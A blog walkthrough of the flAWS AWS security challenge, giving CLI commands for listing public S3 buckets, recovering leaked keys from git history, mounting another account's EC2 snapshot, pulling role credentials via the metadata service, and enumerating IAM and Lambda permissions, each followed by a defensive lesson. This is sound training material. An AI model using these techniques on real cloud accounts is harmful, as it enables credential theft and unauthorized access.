Skip to main content
  1. Labs & Projects/ Cloud Security Misconfigurations Challenge

flAWS is a fun AWS based security misconfiguration challenge created by Scott Piper from Summit Route. I started playing around with it here and there in 2020. I decided to document the whole process from beginning to end as the importance of cloud security skills will become much more important in the coming years.

My Youtube Walk-through #

What’s the point of this? #

I believe the flAWS challenge was created to bring attention to common misconfigurations in the AWS cloud environment. A bulk of the beginning of the challenge has to do with s3 misconfigurations. Check out which lists all the S3 bucket leaks from 2013 to 2022. These vulnerabilities leave product and user data easily accessible to attackers and individuals that would like to use that data for their exploits. Learning how these misconfigurations can go wrong and bringing awareness to this issue will hopefully prevent as many from happening because these leaks can be potentially very damaging to companies and their users.

flAWS Website

Useful Stuff for this challenge #

Level 1: Everyone has access #

The level just reads:

This level is buckets of fun. See if you can find the first sub-domain.

This is probably referring to S3 buckets because that’s the service AWS uses for storage. Also the service that a lot of companies have gotten into trouble for misconfiguring and leaving open to the internet.

All S3 buckets, when configured for web hosting, are given an AWS domain you can use to browse to it without setting up your own DNS. In this case, can also be visited by going to

Use nslookup, host, and/or dig to get more information on the domain #


List the contents of the bucket using aws cli #

aws s3 ls s3:// --region us-west-2
# run the command with no sign request
aws s3 ls s3:// --region us-west-2 --no-sign-request
  • the –no-sign-requests flag tells the CLI not to sign the request or look for credentials for executing the command

Level 1 Solution
Level 1 Solution

Level 1 Secret File
Level 1 Secret File

We could have also easily went on to since we know this is on s3, read the XML file, and found the secret file for level 2 there.

The Problem #

This level allowed everyone list permissions. Don’t open permissions to everyone. By default S3 buckets are private.

Level 2: Any authenticated AWS user has access #

The challenge lets us know this level is going to be the similar but we’ll need our own AWS creds

Level 2 Instructions
Level 2 Instructions

Create an IAM user on AWS #

  • I created a user called demonstrata to demonstrate πŸ˜…

Create New User
Create New User

Configure profile on the CLI #

# input access key and access key id when prompted after this configuration command
# probably safe choosing any region
aws configure --profile demonstrata

List the contents of the bucket using aws CLI with –profile #

# aws credentialed access
aws s3 --profile demonstrata ls s3://

Level 2 Solution

The Problem #

AWS removed this setting but the SDK and third-party tools sometimes allow it

Don’t open permission to any authenticated AWS User, because those could be any user in the entirety of AWS.

Level 3: Keys get leaked in Git History #

The level says that it’s fairly similar to the last but we’ll be able to find some keys this time. How can we list what other buckets are? Hmmm.

Find a git repository #

Use git log to pull old commit history #

  • use git log in the synced directory to pull the git commit history
  • git checkout the first commit
  • find access keys accidentally added to initial commit

Configure a new AWS CLI profile with creds and see what buckets it can access #

We find the URL to the next level:

The Problem #

I’ve personally found access keys on github before. It’s not an uncommon thing. Yeh, devs should be more careful with their commits but more so the problem is the secrets weren’t “rolled”. Access keys and any sort of passwords should be changed on some regular interval and when an incident happens like keys are leaked in a publicly accessible space then those keys should be immediately revoked.

Level 4: Accessing EC2 Instance Snapshots #

Level 4 Instructions

Our goal here is to get access to the ec2 instance here.


When we got to the website it asked for creds we don’t have

Web Page Access Denied

Identify Account ID of those creds we found in previous level #

aws --profile level3 sts get-caller-identity
I named all my AWS profiles based on the level I found the creds so level3 is the profile for the creds we found in the last level but you could name them whatever.
# see all the snapshots associated with this user
aws --profile level3 ec2 describe-snapshots --owner-id 975426262029

Use Get Caller Identity Function

# we can even see more if we run the same cmd without owner id
aws --profile level3 ec2 describe-snapshots

Describe Snapshots

Create a Volume for the snapshot #

aws --profile demonstrata ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

Duplicate Snapshot into a Volume
We duplicate the snapshot into a volume in our own AWS account

You have to go into the console in the us-west-2 region. You won’t see the volume in other regions.

Create ec2 instance from Snapshot #

  • simply create an ec2 instance using the snapshot as a volume
  • important things to configure here are using /dev/sde and delete on termination options

Create ec2 from Snapshot

Configure Pem File #

  • download the ssh key and put it in your operating folder
  • change the permissions
chmod 400 flaws.pem
  • ssh into the instance
ssh -i flaws.pem [email protected]'your-instance-public-ip'

Mount the Volume #

  • this will list information about all available block devices
  • mount the volume you added - should be 8gb
sudo mount /dev/xvde1 /mnt

Find keys in the Instance #

  • navigate to /mnt/home/ubuntu and find the .sh file
  • use the creds to login

End of Level 4

The Problem #

People sometimes use snapshots to get access back to their own EC2’s when they forget the passwords. This also allows attackers to get access to things.

Level 5: The Magic IP & Metadata Service #

The level asks us to use the proxy to figure out how to list the contents of level6 bucket that has a hidden directory in it.

  • If we try to go to the URL:

Access Denied

Access the Metadata service for #
  • We find some creds in the metadata

Find New Creds

Find Secret Directory

The Problem #

Applications should not allow access to or any local and private IP ranges. IAM roles should be restricted as much as possible.

Level 6: Read-Only? Permission Trouble #

This level we actually get some keys with SecurityAudit policy attached to them. But they might be able to do other “things”

Configure another profile with the keys and figure out what they can do #

aws --profile level6
  • figure out what this profile has
aws --profile level6 iam get-user
  • list policies attached to user
aws --profile level6 iam list-attached-user-policies --user-name Level6
Don’t be confused. The user profile I configured is “level6” and the user name is actually “Level6” coincidentally
  • view the policies
aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit --version-id v1
aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

Lambda Functions #

  • using apigateway to list lambda functions
aws --region us-west-2 --profile level6 lambda list-functions
  • get policy for lambda
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
  • we find something about the ability to execute an api with the id s33ppypa75
aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"

Level 6 API

End of flAWS

The Problem #

We shouldn’t hand out any permissions liberally, even permissions that only let users read meta-data or know what their permissions are. Information is power. We should remember that when configuring things.

The End #

Final Thoughts #

I’m still thinking about it to be honest…πŸ˜‚.

I think I would like to learn more about understanding lambda functions.

s3 Bucket